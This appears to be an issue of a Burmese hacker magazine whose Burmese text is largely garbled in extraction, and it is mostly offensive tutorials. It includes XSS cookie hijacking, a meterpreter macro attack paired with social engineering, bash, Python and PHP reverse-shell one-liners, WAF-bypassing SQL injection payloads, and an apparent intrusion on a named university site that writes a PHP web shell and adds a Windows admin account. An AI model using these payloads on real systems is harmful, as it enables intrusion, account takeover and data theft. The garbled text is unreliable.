UG@Magazin

1|Page UG MAGAZINE VOL 2 Produced By MBH
Power By Union Of Underground Myanmar Hackers



Find the Egg with enumeration 8
Google Hacking Data Base 17
Installation Wordpress In Kali Linux 20
DNS (Domain name System) 24
Hijack Cookies with XSS 32
LAZYSYSADMIN WRITEUP 40
Attacking With Macro 46
REVERSE FROM THE SERVER 50
COOKIE BASED INJECTION 56
W S ၐ Load_File ႔ 60
Http-Parameter-Pollution 70
CTF Experience 78
RED ROOM 81
HISTORY OF HACKING 85
Fire sale Cyber attack 89
SOCIAL ENGINEERING 92
BITCOIN ( BTC ) 110
DOCKER (၁) 111

Developer vs Pentester In Myanmar 115
Cyber Warfare 119
facebook account 124
Sqli Injection [ routed query] 130
CSRF(cross site request forgery) 138
How to deface with JS or XSS defacement 143
How I hacked Android App 149
Cryptography&Encryption For Beginner 157
D // D ‘t 162
Attacking Web Service 168
Facebook Security 174
How Search Engine works 181
How to Hide Backdoor In Website 184
Interview with UGMH 187
Web Server Hacking 190
197

႔ ။
။
။
။
႔ ။
႔ Wikipedia ႔ Website
႔ ၊ ၊
၍ ၊
Movie ။Google ႔
search engine
။ ႔ ႔ ၍
။ ၏
။
၍ ၏
။ ႔ ၐ

။ ႔ ။
Cloud storage ၐ ႔ ၊Online shopping ၊ ၐ
။ website ။
။ Security
။ ႔ ႔ Security ၊
၍ Security
social website Facebook ။

Facebook ။
၊ ၊ ၊
ၐ ၊
၊ ။
Facebook
။
႔ ။ Online ႔
။ ႔
။
Internet ၐ social
network ၐ ။
Facebook account ၍
။
D ၊ ၐ
။ ။ ။
၍ ။ ၍
ၐ ။
၍
၍ ႔
၏ ။
Min Thu (UG Magazine Editor)
Myanmar Black Hacking

Find the Egg with enumeration

Min KoKo
Security ။Target ( )
႔ ။ ။System Information
Pentesting ။
႔ ။
lock ႔ ႔ ။
။ ႔ lock
႔ ၊ S t
။ System T t S t S
။ Attacker ( H System
။ P
Target System information ။
information gathering ႔ ။ footprinting or enumeration ႔
။

1. IP and DNS enumeration
Kali linux default ။Domain Information

C ။ DNS Name Server Contact email address
O t ။ Whois Command www
။
Target – google.com
Whois record domain name Owner IP Address, Contact address, Domain

expire date name server t ။Website
whois.domaintoosl.com ။
Target – twitter.com

10 | P a g e UG MAGAZINE VOL 2 Produced By MBH
Dnsenum dns information ။
Target – amazon.com
Target DNS ႔ DNSSpy ႔ ။ DNSSpy target

U t email ႔ ။ DNSSpy Website https://dnsspy.io/ 7 free
႔ ။ ။

DNS reverse tool viewdns website ။ DNS ႔ IP

႔ ။
2.Enumerating Subdomain

Target websit ႔ Target system ႔

႔ ။ A t subdomain
႔ ။ subdomain enumeration
။ Subdomain T
Sublist3r, enumall Aquatone ႔ ။ ။
T ။
T ။ ။ ႔
။ Dig
command subdomain takeover ။
1. Sublist3r
Download - https://github.com/aboul3la/Sublist3r
./sublist3r.py -d google.com -t 3
2.enumall
Download - https://github.com/jhaddix/domain
./enumall.py yahoo.com

3. Aquatone
Download - https://github.com/michenriksen/aquatone
Aquatone-discover -d corp.yahoo.com
3.Build Technology
Target ။
target system exploit ႔ ။
Browser extension ႔ ။ C view page
souce ။

Command line tool ႔ whatweb target t

႔ ။ CMS ႔ CMSMap Tool ။
results ၐ ႔ ။ CMS Wordpress ႔ wpscan
။
Whatweb
CMSMap

4. Finding hidden resources
Crawling ။ t t
။ Scann Crawling R t scan ။
scan ။ crawling process
scan ။
crawling ၐ hidden file

backup ။ process ။
Burp, Acunetix ႔ dirbuster T ။ Acunetix
Window ႔ ၊ dirb linux and windwo ။
t ။ Burp suite ။ Window Linux
Support ။ Mac ႔ ။ Burp spider function crawling ။
Tool Cangibrina ။ t
admin panel ႔ t ။ t ႔
။
5. Port Scanning
Target basic information ႔

။ nmap target system S
႔ ။ exploit ။ ႔ nmap
Dracnmap ႔ ။ nmap
႔ ။Hacker ႔
။
6. SSL Checks

Target system https ssl ႔ ။ ssllabs GUI

t ။ t ။ ႔
SSLCLI command line tool ။Certificate
t ။ SSL Heart -
bleed, Drown, Poodle, Freak ။
7. Github Repositories Github ။ public

t ။ gitrob
t ႔ tool ႔ ။ results
config file, updae password, ။
8. Mapping Data t ႔ system

႔ ။ Freemind, Mindmup, Mindnode,
Mindjet, XMind ။ ။
t ။
႔ clients report t
။ Ref - http://blog.gaurangbhatnagar.com/2017/07/10/Art-of-Enumeration.html
Blog ။
Thanks for reading...
Min KoKo
Google Hacking Data Base
Zen Zue 127.0.0.1
Google ။
။ weak ။
GHDB Hacking ။ T t F D t
႔ ။ Google 1997 September 15 Register ။
Company 1998 ။ ႔G D
႔ Hacker ။ C D t
။
https://www.exploit-db.com/google-hacking-database/
S ။ ႔
။Search box ။Key
၊ ၊ ။ ။ ” ‖ ႔
‖ ‖ ႔ ႔ ။ ။ Key
။
Dork ။
Inurl
website URL t V ။
- inurl:index.php?id= inurl url ။index.php

id t = value ။ id=1 or id=2
။ Sql injection ။ File including
inurl:index.php?file=*.php ။ inurl ။ OK
Site: ။ .com .com.mm filter
။ inurl:index.php?id= site:.gov.mm gov.mm
။ ။
Myanmar customs
http://www.myanmartradeportal.gov.mm/index.php?r=site/display&id=770
။ ext: t t ။
Ext:sql site:go.id
http://pauddikmasjateng.kemdikbud.go.id/ecourse/ekursus_1_nop_2016.sql
။S zip bak ။ Intext

& intitle ။ Text title dork
။ Exploit-db dork ။
inurl:"/address/speeddial.html?start" and intext:"Please configure the password" and

intitle:"Brother"
url /address/speeddial text pls config d pwd

title brother ။B t t password configure
။Title title browser title bar ၐ
။ Result ၐ ။ ။Back
။
႔ down Udmey t t ။
။ Tut title :download ။ tutname ext:rar
။ ။

။ t
။ goldchannel gold channel ၐ
။ goldechannel :myanmar
။Crack t t t ။ Inurl
intext ၐ ႔ ။
႔ ႔
။Dork simple ၐ exploit-db
။
………………။
Zen Zue

Installation Wordpress In Kali Linux
mr.Gh0st N@0b ( Myanmar Noob Hackers Team)
Kali Linux ။ XAMPP ႔ Localhost ။

XAMPP Mysql Config ။Installation
႔ ႔ Download ။
Requirement:
- Apache2 server (Kali Linux OS )
- PHP 5.2.4 or greater
- MySQL 5.0 or greater
- Sublime Test (Text Editor)
- Wordpress Files (https://wordpress.org/download/)
- PhPmyadmin (http://www.phpmyadmin.net/)
Step – 1
PHP 5.2.4 or greater ႔ MySQL 5.0 or greater ။Terminal
root@mnh:~# php -v
PHP 5.4.36-0+deb7u1 (cli) (built: Dec 31 2014 08:33:05)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2014 Zend Technologies
root@mnh:~# mysql -V
mysql Ver 14.14 Distrib 5.5.40, for debian-linux-gnu (i686) using readline 6.2
Step – 2
Wordpress ႔ P P

F S t > > ႔ wordpress.zip ။
F t > > phpmyadmin.zip ။
Step – 3
Terminal
root@mnh:~# chmod 777 /var/www/
root@mnh:~# chmod 777 /var/www/*
Chmood 777 R W t P ။ phpmyadmin config

။
root@mnh:~# cd /var/www/phpMyAdmin-4.3.6-all-languages/
root@mnh:~# /var/www/phpMyAdmin-4.3.6-all-languages
root@mnh:~#mkdir config
#config directory create ။
root@mnh:~# chmod o+rw config
# t ။
root@mnh:~# cp config.inc.php config/
#config.inc.php copy editing ႔ ။
root@mnh:~# chmod o+w config/config.inc.php
#chmod o+w t ။{ # }
။
Step – 4
http://localhost/phpMyAdmin-4.3.6-all-languages/ Mysql root ႔ login ။

login ။ password reset ။ Terminal
root@mnh:~# service mysql stop
root@mnh:~# mysqld_safe --skip-grant-tables

[Output:[1] 5988 Starting mysqld daemon with databases from /var/lib/mysql
mysqld_safe[6025]: started ( Terminal
root@mnh:~# mysql -u root
mysql > use mysql
mysql > update user set password=PASSWORD("NEW-ROOT-PASSWORD") where
User='root';
―NEW-ROOT-PASSWORD‖ ႔ Password )
mysql > flush privileges;
root@mnh:~# service mysql restart
root@mnh:~# mysql -u root –p
P ―NEW-ROOT-PASSWORD‖ ႔ ႔ Password ။
( Terminal Copy NEW-ROOT-

PASSWORD ႔ login Skill :v )
Step – 5
Wordpress database user ။Login ႔ Databases Tab

Database ။Database_Name wp_mybaby ႔ FA
႔ :P) Collection t8 Create Button
။User ႔ User Tab Add user ။User name: Use text field
။Host Local localhost ႔ ၐ ။
password ။Global privileges Check all Go ။
User Tab wordpress user Edit Privileges ။ G T

Database Tab ။A t t : wp_mybaby or
wp_yourname Go ။ Check all Go ။
wordpress Database ႔ User Table Phpmyadmin ႔ ႔

Step – 6
http://localhost/wordpress/wp-admin/setup-config.php
wordpress
/var/www/ wp-config-sample.php text editor ႔
define('DB_NAME', 'wp_mybaby');
define('DB_USER', 'root');
define('DB_PASSWORD', 'iloveu');
႔ ၃ save as ႔ wp-config.php ။
Wordpress register ။
Thanks for your patient,

DNS (Domain name System)

Surf GHT
DNS IP Name ႔ ႔ ။ IP ႔N
change ။ ႔ ႔ ။
( ) ။ ႔ Change
႔ ။ Change ။ ။ ( )
႔N ႔ ၐ ႔။ ၁ ၂
( ) ။ ႔
။ Number ႔ ႔ ― (၁ ၂ ၅/
‖120005‖ ။” ၐ ႔ ( ႔ ၐ
႔ ၐ ။
N t ၐ IP domain name ႔ ၐ IP ႔ ၐ
။ ႔ (www.facebook.com) ႔ ၐ ႔ ႔ IP
31.13.78.35 facebook.com ( Number
) ႔ IP D
System DNS Server (Domain Name System Server) ။
O SUSE L 42 1 64 ၐ DNS Serv I t t C t
။DNS Server ( BIND) package file terminal
။
#zypper install bind* ႔ ။

named.conf file t vi editor ၊ commend

…
#vi /etc/named.conf
named.conf ။line no. 54 forwarders DNS

။ YTP DNS 10.10.10.10 ။
forwarders {10.10.10.10; };
# #
t ။ t ႔ ။ Line 67
Listen-on port 53 {127.0.0.1; 192.168.1.54; };

Under line Linux server IP ။ ၁ DNS Local

Network IP Address t t IP ႔ … DHCP IP
t IP ဏ ဏ ။
Allow-query ။ allow-query {127.0.0.1;192.168.1.0/24; };
။ ႔ ။
named.conf file ။
၁ ။ zone file named.conf zone
file ႔ ။( ၁ ၁ ႔ )

― ‖{
type master;
― t / ‖;
};
―54 1 168 192 - ‖{
type master;
― t /192 168 1 54 ‖;
};
Esc :wq ႔ save ။Named.conf file

႔ ။
#vi /etc/resolv.conf__

#touch /var/lib/named/master/192.168.1.54.zone
#vi /var/lib/named/master/192.168.1.54.zone
#touch /var/lib/named/master/mrsurf.zone
#vi /var/lib/named/master/mrsurf.zone

#service named start
#service named status
A t DNS S t ။

T …
။ ။ slave zone ႔ configuration ။
Surf

Hijack Cookies with XSS
Author: Pyae Nyein Chan
Cookie ႔ ႔ information ။C w t browser

hard disk ။ ႔
website ႔ ။
[more :http://www.boomhack.net/2013/12/810]
႔ User website Login ။ Login

user session information maintain ။ ႔Remember Password
႔ ။ Web User Browser cookie ႔
data ႔ ။Browser cookies ။ plane txt ႔ browser User
hard disk stored ။ Browser R t Web ႔
Cookie ႔ ႔ ။ Web ။
So How to Hijack Admin's Cookies?
M t XSS A ႔ hijack
။ Download ။
https://github.com/DisK0nn3cT/CookieCatcher
Free Hosting ႔ ။

XSS Payload 2 ႔ #1 ။ XSS Q t ။

Save ႔ ။
႔ Website User ႔Login ။
Admin X P ။

႔ ႔ Xss Payload web "Hey there" ၐ ။ link

? ႔ ႔P S ။

႔ Xss Payload .. C C t
။
.. .. ႔ User ႔ Login web ႔ IP ၐ ..
Admin ႔ ႔ ႔ C
။ ! :D
႔ Admin ႔ ။ Admin C ။
08iq0nf......! Ok :) C C t ။Admin Web ႔ IP

။ H C ။ ႔ C
! PHPSESSID=08iq0nf...... ။
. Admin Cookies .. Cookies Login ?
>>>>>>>> [How to Login with Cookies?] <<<<<<<<<<<
Burp Suite ။ Repeater C Copy past ။
Go Response ။
Right C Show response in browser Link C ။

:)

User ႔ Login Page ။ Burp Suite L

past ။
Admin Cookies Admin Page :D

။ =) Thz for Reading !
Ref : Danny Chrastil & team0x5bd.net , bbb
Pyae Nyein Chan


LAZYSYSADMIN WRITEUP
Download Vm Link – https://www.vulnhub.com/entry/lazysysadmin-1,205/
vm download vmware vbox run ။vm os

႔lab ႔ ။ scanning ။ nmap ႔ scan command
nmap -sV 192.168.43.67 ip ႔ ။ network
။ namp -sV 192.168.43.0/24 network ။
scan result ။
ssh,http,mysql,samba t ႔ ။Port 80
nikto tool ႔ ။ nikto -h 192.168.43.67

Site wordpress site phpmyadmin browser ip

ၐ ။ http://192.168.43.67/wordpress and http://192.168.43.67/phpmyadmin
wordpress wpscan ႔ website scan ။
wpscan -url http://192.168.43.67/wordpress –enumerate users

wpscan vuln ႔ username admin ။ ႔။ samba

port nse script ႔ share t ႔ scan
။ scanning ။
႔ share$ folder anonymous access ။ smb client ႔ ၐ

။ smb:\\192.168.43.67။ share$ folder ႔ ။
share$ folder anonmyous connect ။
folder ။

႔ ႔ - ႔ ။
DB_USER – Admin
DB_PASSWORD – TogieMYSQL12345^^
႔ phpmyadmin login ႔ ။
Phpmyadmin wp admin password change permission ။

႔ db_user and password wordpress login
။ ႔ ၐ wpscan scan username Admin ။

wordpress site metasploit

။
meterpreter session root access ႔ ။
/etc/passwd file togie user ႔ ။
local root exploit share$ folder deets.txt file

password ႔ ႔ togie user password ႔ ssh login ။

။ ႔ ။ sudo
password ။
root access ။ ၐ proof.txt ႔ cat ႔ flag

file ။
Wai Yan Htet
Facebook - https://www.facebook.com/waiyanhtet007

Attacking With Macro
A macro is a feature that allows users to create automated processes inside of a document
used by software like Microsoft Word, Excel, or PowerPoint. This is used to enhance user
experience, increase productivity, or automate otherwise manual tasks. But, in other words, it
executes code. What kind of code? Well, pretty much whatever you want, even a Meterpreter
session!
P.S – P t I ‘t D ‘t tt t ;
Just basic level.
Techniques: Unicorn & Social Engineering
Macro attacks are nothing new or unusual.A typical attack usually involves embedding
malicious macro code in an Office document, sending it to the victim, and asking him or her
t t t T t t ‘t t tt ,
basically begging the victim to run your malware. It's that people have been falling for this
t ! L t‘ t t
1. First download unicorn from https://github.com/trustedsec/unicorn

2. You can find usages by simply run unicorn.py. Type following command to create macro.
Python unicorn.py windows/meterpreter/reverse_tcp <ip> <port> macro
Do you see Unicorn???
3. Your code is saved to powershell_attack.txt
4. Open excel, then click on Macros in VIEW tab.
5. Create your ugly program. ;)

6. Copy macro code from powershell_attack.txt that was generated from unicorn. Then paste
it.
7 M t ―E M -E W ‖
type.
8. Use your social engineering technique to enable content as previous t ‘ t I

victim click enable content, u won the lottery.

9. Success.
For further walking,
Ref: https://blog.rapid7.com/2017/03/08/attacking-microsoft-office- openoffice-with-

metasploit-macro-exploits/
https://www.youtube.com/watch?v=OzekG1I-do0
https://thehackernews.com/2017/10/ms-office-dde-malware.html
I t t t , I‘
Truly,
Optimus Prime

REVERSE FROM THE SERVER

Thura Moe Myint
Server shell access t t root ။

command run ။R t RUN ႔ reverse ႔ ။
What is reverse shell?
A reverse shell works by the remote computer sending its shell to a specific user, rather than
binding it to a port, which would be unreachable in many circumstances. This allows root
commands over the remote server. reverse shell Server reverse connect
။ reverse connect ။Local host port 443
list target port connect ။
nc -lnvp 443
Bash ႔ reverse ။ target ႔ port reverse shell

bash ။
In target console,
E t reverse ။ t t ။

Root reverse user mgthura t ။

web sever ။
Command :
bash -i >& /dev/tcp/ipaddress/port 0>&1 -m
bash ႔ reverse ။ perl script php script

႔။
perl script Link download ။
https://pastebin.com/raw/EcKH5Ah4
Script source from pentestmonkey
Perl extension ႔ ၐ ။

I t script run ။
$$ : perl script.pl
P t attacker revrse ။
Reversing with python 2.7
Console t ႔ ။

Script source : pentest monkey
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ipa
ddress",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
In attacker machine ,
python ႔reverse ႔ ။
Reversing with php
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-
shell.php
Script
Ip and port ။ php script Run

C t ။
Window reverse t ႔ ။Window ။
For Window
Script Source: Dhayalanb
https://raw.githubusercontent.com/Dhayalanb/windows-php-reverse-shell/master/Reverse
Shell.php
ip and port ။ host.com/yourreverseshell.php Execute
Window reverse ။
Using ngrok to listen port

port forward ။ port listen ႔ ႔ ။
https://dashboard.ngrok.com/user/login Register os download

Instruction config ။
./ngrok tcp port
0.tcp.ngrok.io:port tcp port port t ။
./ngrok tcp 443
Sudo nc -lnvp 443 ႔ t ။Reverse 0.tcp.ngrok.io:port

listen 443 ။ ႔ port forward
။ ။ revrse
႔ ။
Thanks for reading,
Thura Moe Myint

COOKIE BASED INJECTION
Kyaw Phyo Zaw
Tutorial Injection 412 Error Cookies Manager bypass

။ T t site.com/detail.php?sid=1 ။V single
t ‗ ။ Warning: mysql_fetch_array(): supplied argument is not a valid
MySQL result resource error ။
www.site.com/details.php?sid=1' order by 10—
-Q order by 412 Error :3
URL Encode Method ႔ bypass ။ 412 Error ။ URL

Encode Method ႔ bypass ႔ ။
www.site.com/details.php?sid=1%27%20order%20by%2010--%20-
www.site.com/details.php?sid=1'%0border%0bby%0b10--
www.site.com/details.php?sid=1'/**/order/**/by/**/10-- -
Hmm :3 Still Error
bypass ႔ ။ Cookie inject bypass ႔

႔ Cookie Manager Addons ။
https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
။ Addons ။ Search Inject Edit ။Target

www.site.com/details.php?sid=1 Name parameter (sid)၊ Content id (1)
။ Domain www.site.com target ႔ ။
Save ။

Browser www.site.com/details.php ၐ Cookie Manager save ႔

refresh ။ single quote query fixed
columns order by ႔ ။ order by 9 error

vuln columns ။
Columns 3,4,5 ႔ ႔4 version() ။B GO :D t

dump ႔ ။ t DIOS Query
WAF again :3

DIOS Query bypass ။
export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns
+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!5
0000table_name*/,2)),@,2)
Got it ! D t dump ႔ ။ t :P Cookie

Manager ႔ Live HTTP Headers ။Target
www.site.com/detail.php?sid=1 Live HTTP Headers Target Site refresh
Replay C : PHPSESSID= 665 t 4 288 0t5 t 7 (;) parameter
(sid) ႔ inject ႔။

403 F bypass ။ WAF routed

query injection bypass ႔ ။ trick ႔ WAF bypass POST
parameter bypass ႔ ။။
T F R ………
Kyaw Phyo Zaw

W S ၐ Load_File ႔
႔ ၊Loa
d_file ႔ ႔ ၊T t ႔
( .. :P ) ႔ T t ။(
။:D ) ။
႔
column count ၊ inject ႔၊
WAF(Web Application Firewall) Bypass ၊
Data ႔ ၊ P H ႔ crack ၊
Admin Panel ႔ ( Facebook
႔ ႔)။ … ႔
။ ၐ
A t website ႔ ။
….
SQL V ႔ website ႔-
tt :// t t / ? t = 0 ။ SQL V
႔ inject admin user & password ႔t D t
႔ ႔ (၁) ႔ ႔ ႔
။
(၁)

႔ ။ ။( ၊ )။
႔ ႔ ႔ ႔ ။ ႔ ႔
load_file ။ Load_File ႔
႔ ၐ F ႔ ။
Load_File L S ၐ /etc/passwd ၊ /etc/hosts
၊ Windows Server ။ ႔? !!
SQLi Vulnerable Test SQL Error Message ႔ ႔ File Document Directory
ၐ ႔ ႔ ။OK… SQL Error Message
C:\xampp\htdocs\found.php ..Server Admin ႔ ႔ website t
။ … ႔ load_file found.php ႔ F
read ႔ ၐ ႔ -
http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,load_file("C:\\x
ampp\\htdocs\\found.php"),3,4,5,6,7,8,9,10,11--+

Hmm.. ႔ browser php code ႔ ၐ ၊ ႔ ႔

႔ load_file ႔ ။ view source ႔
႔ found.php ႔ ႔ ။
G t ! It‘ ။ ႔
႔ ၊ ႔ ။ ႔
႔ ။load_file ၐ
read ႔ ႔ ၊write ႔ ႔ ႔
႔ -

http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,group_concat(
user,0x3a,file_priv),3,4,5,6,7,8,9,10,11 from mysql.user--+
root:Y,root:Y,:N,pma:N,super:Y ၊ ႔ ..။ root & super ႔

File_Priv ။ ႔
႔ ။ ႔ ႔ user name
႔ ႔ ႔၊ ႔
႔ ႔ ႔ super filter ႔ ။
http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,group_concat(
user,0x3a,file_priv),3,4,5,6,7,8,9,10,11 from mysql.user where user=0x7375706572--+
႔ ႔ super ႔ ( super ႔ hash

value 0 7375706572 )။ ႔ file_priv ႔
။ ။ ႔ into outfile ႔
command ၐ ႔ -
http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,"<?
system($_GET['cmd']); ?>",3,4,5,6,7,8,9,10,11+into+outfile+'C:\xampp\htdocs\cmd.php'--+

GET Method into outfile

႔ ႔ server ။ ႔
။Website Error ၊ Error SQLi Vulnerable Test
႔ Error Message ႔ ၊ (P.S => File Privilege
‘t t ႔ Error Message )။Browser
႔ ႔ File S ၐ ၊ ႔ ..
http://library.northsouth.edu/cmd.php
OOP!! Page Not Found … ႔ ႔ File load_file

၊ ။Out
File ႔ ႔ 'C:\xampp\htdocs\cmd.php' Document_
Directory ႔ ။ Directory ႔ ႔ ႔ File ???

႔ ၊Directory ႔ 'C:\\xampp\\htdocs\\cmd.php'
႔ File ႔ -
http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,"<?
system($_GET['cmd']); ?>",3,4,5,6,7,8,9,10,11+into+outfile+'C:\\xampp\\htdocs\\cmd.php'--
+
A S E M ? ၊ Browser ႔ cmd.php ႔F
႔ -
Bingo!!! ႔ File S ၐ ။ ႔ File

႔ ၊ backslash
႔ ။ ႔ ႔ ႔ ႔ ႔ ၊
။ Programming ႔ \n ၊ \t
႔ ႔ ႔ ႔ ၊ ႔ \n = >next line
႔ \t=> a tab or 6 spaces ႔ ။ ႔
double backslash ( ႔ ) double front slash ႔ ။
Directory Path ႔ Server ။ ။ (P.S=>
႔ S single quote ၊ double quote ၐ

။) ။ ႔ ။ ႔ eval code
႔ ႔ ႔ -
http://library.northsouth.edu/cmd.php?cmd=dir
႔ ၊ File uploader ၊ Shell ႔။

႔။ ႔ linux server wget & curl ။
။ ႔၊OMO ႔ ။( ။ :P
)။ wget /curl ၊ put ႔-
tt :// t t / ? = ― code !‖ > t t

Server ၐ uploader.txt ႔ ႔ echo function ႔ ႔ upload file
႔ ။ ႔-
http://library.northsouth.edu/cmd.php?cmd=move uploader.txt uploader.php
move command uploader.txt uploader.php ႔ ။

႔ ႔ ၊ ႔
။ Attacker ၐ ႔ backdoor
wget (or) curl remote file download/upload ႔ ႔ ၊ file create ႔
႔ ႔ ႔ ႔ ။ ႔
႔ ႔။ ။ ႔ load_file ႔F
read ႔ Server ႔ ႔ PMA(PhpMyAdmin) password
file access ၊ - website ႔ database configuration file
read phpMyAdmin Panel ။ ႔ ၐ ႔ ႔

။ ႔ pma ႔ passwords.txt File read

႔ ။
႔ ႔
။Server ႔ ႔ Security
႔ ႔ ႔ H
hacked
႔ ။ ႔ ႔ ႔
dir command file & directory list ၐ ႔
website file ႔ i.php
။
႔ i.php ႔ ၊
႔ ႔ ႔ ႔ ႔ -
http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,load_file("C:\\x
ampp\\htdocs\\i.php"),3,4,5,6,7,8,9,10,11--+
႔။ ။ view source
။ ၊ ႔
obfuscated ။

႔ ႔ D damn Hacker shell

file password ။ ၐ ၐ
။ (P.S=> password hash ႔
crack ႔ ႔ t crack password
။)
႔ ႔ shell upload ။

Server W S 2003 Security

Anti-Virus ႔ ။ ႔ shell ႔ ႔
Anti-Virus D t t ႔ ။ ႔
႔ ၊ ၐ ႔
(P.S=> ၐ )။ ႔
load_file ႔ ႔ ။
။ Deface ၊It‘ t I ! ?
႔ ၊ ႔ ႔ Server administrator
account ႔ ( Permission ႔ )–
net user YOURUSER YOURPASS /add
YOURUSER ႔ ႔ ႔ user name ၊ YOURPASS

႔ user name ႔ password ႔ /add ႔ command ႔ Server ၐ
account ။ ႔ user user ႔ ႔
t t ႔ ႔ -
net localgroup Administrator YOURUSER /add
user level Administrator Level ႔

user administrator level access ႔ / ႔
-
net user youruser

Administrator Level ႔ Remote Desktop Protocol(RDP)

႔ ႔ ။ ႔
၎ ။RDP ၊
႔ ႔
။( password Hash ။ )
Zer0flag(Myanmar Security Forum)

Http-Parameter-Pollution
Introduction
HTTP Parameter Pollution Attack MSF ( Myanmar Security Form ) Post

။ Magazine SQL Injection CSRF
Att WAF ( Web Application Firewall )
။ HPP WAF Bypass ။
။ HPP
Attack ၊ HPP F t Bypass
၊ Example ။
W t‘ HPP Htt P t P t Att ?
HPP Attack 2009 OWASP Conference di Paola ႔ Carettoni

႔ Injection Class ။ HPP Attack
။ Attacker HTTP t t
၍ Web Appli -cation ၊Input Validation B
Exploitable Varia -bles Http Parameter Pollution
Att HPP ၐ ။ HPP WAF B
႔ ။ HPP Attack 2009
႔ ၊ ႔ ။
HPP Attack SQL Injection ႔ CSRF Bypass ။
Parameter Precedence in Web Applications
W A t D t sanitize
Http Parameter (e.g:GET/POST/Cookie) ႔ Attacker P t
။ Web Application
t ႔ ႔ ။
႔ Web Application U I t
။

Table
။ ႔ Website ႔ Http Protocol ႔R t
Website ႔ Server ႔ ။ R t
႔ ? Htt R t Htt P t ၐ D t
Transfer ႔ GET/POST Request ႔
Table ႔ -
႔ Input ႔ ႔ Htt GET POST R t ႔ ။
GET /index.asp?param1=value1& param2=value2 HTTP/1.1
Host: www.myanmarmiss.com
User-Agent: Safari/535.1
Accept: text/html,application/xhtml+xml
POST /index.asp HTTP/1.1
Host: www.myanmarmiss.com
User-Agent: Safari/535.1
Accept: text/html,application/xhtml+xml
Content-Type: application/x-www-form-urlencoded Content-Length: 27
param1=value1& param2=value2
Technology/HTTP Back-End Overall Parsing Result Example

ASP.NET/IIS All occurrences of the specfic parameter par1=val1,val2
ASP/IIS All occurrences of the specfic parameter par1=val1,val2
PHP/Apache Last occurrence par1=val2
PHP/Zeus Last occurrence par1=val2
JSP,Servlet/Apache Tomcat First occurrence par1=val1
Table Web Technology U I t P t

Parameter ။
Table ႔ ၊ ။
Http Parameter Pollution(HPP) Attack Web Server

။ HTTP R t ႔
t ႔ ႔ ႔ (=) , (&) ႔
။ -
GET / index.php? A = 1 & a = 2 & a = 3,4 & a= 5 & a = 6 HTTP/1.1
User-Agent:Modzilla/5.0
Host: Host
Accept:*/*
POST / index.php? A = 1 & a = 2 HTTP/1.1
User-Agent:Modzilla/5.0
Host: Host

Accept:*/*
Cookie: a = 3, a = 4
Content-type: text / plain
Content-Length: 7
Connection: close
a=5&a=6
႔ Client Side User Http Request (GET/POST) ႔ ။

User ႔ Htt R t Server R ။
၊ ။ ႔ Web Application A /PHP ႔
Server ႔ ႔ req t Server
။ ႔ W T Handle ‗ ‘ ႔
‗3‘ t ။ ႔ ႔ Web Server IIS / ASP NET
႔ ၎ ႔ Handle ‗ ‘ ႔ 1,2,3,4,5,6
႔ Request Data ။ IIS/ASP.NET
parameter ႔ ႔ separate rep
။ -
http://www.yourwebsite.com/index.php?page=profile.php&id=1&username=zer0flag&userna
me=$n1ff3rg0d
username ႔ URI ‗=‘ ႔ ‗ ‘ zer0flag ၊$n1ff3rg0d ႔

PHP/Apache ႔ ႔ zer0flag
$n1ff3rg0d $n1ff3rg0d ႔ profile
။ S T Handle
႔ ။ Web Application IIS/ASP N t ႔
႔ ။
.. ႔ T ႔ ။
႔ ၊
႔ User ႔ ႔ t ႔ ‗ ‘ ‗=‘ ႔ ‗ ‘
႔ W A t ၊ ..
။ ႔
SQL Injection Attack ။ ႔ SQL Injection WAF ႔
႔ Bypass ႔ ၊ SQL Injection ႔

Parameter Pollution SQL injection Bypass ႔ ၊ ႔…

Parameter Pollution SQL Injection B ။ ႔
IIS/ASP.NET ႔ ႔ website Bypass ႔ -
http://www.target.com/index.aspx?id=-1+UNION+SELECT+username, password + FROM +

users-
႔ I t ႔ query ။ query IIS Server ႔

Firewall ႔ ModSecurity query request block ႔ ။ IIS ႔
Request.QueryString [* id *] id ႔ ( GET/
POST/Cookie ႔ ) ႔ ႔ ႔
‗/ … /‘ ႔ t split ႔ ModSecurity ႔ block
႔ ႔ ။
http://www.target.com/index.aspx?id=-
1/*&id=*/UNION/*&id=*/SELECT/*&id=*/username&id=password/*&id=*/FROM/*&id=*/us
ers–
႔ Http Parameter Pollution t split ။

IIS/ASP.NET Server inject ႔
။
http://www.target.com/index.aspx?id=-1 / *, * / UNION / *, * / SELECT / *, * / username,

password / *, * / FROM / *, * / users –
.. ႔ ModSecurity Bypass ႔ ။ IIS/

ASP.NET SQL Injection Bypass W A t
႔ ႔ ။ ႔ JSP ႔ Web
A t ၐ HPP ႔ ႔ ။
Url : http://missmyanmar.com/missmsf.jsp?poll_id=1111
Link1: < =" t ? =1111 =N K ‖>
Vote for Nang Khin Zayar </a>
L 2: < =" t ? =1111 =K W tW ‖>
Vote for Khin Wint Wah </a>

႔ ၊ Myanmar ႔ ႔
႔ miss ။ ႔ miss Myanmar ႔ vote
။ poll_id Web Developer sanitize ႔
႔V ႔။ Attacker ႔P t ႔ link
t ။
http://missmyanmar.com/missmsf.jsp?poll_id=1111%26miss%3DKhin Wint Wah
Attacker V ႔ poll_id ႔ link ။
<a href=vote.jsp?pool_id=1111&miss=Khin Wint Wah&miss=Nang Khin Zayar>
Vote for Nang Khin Zayar </a>
<a href=vote.jsp?pool_id=1111&miss=Khin Wint Wah&miss=Khin Wint Wah>
Vote for Khin Wint Wah </a>
Miss Myanmar vote ႔

Attacker ႔ Link ႔ Att
႔ ။ ႔V t Nang Khin
Zayar vote ႔ Khin Wint Wah Vote ။
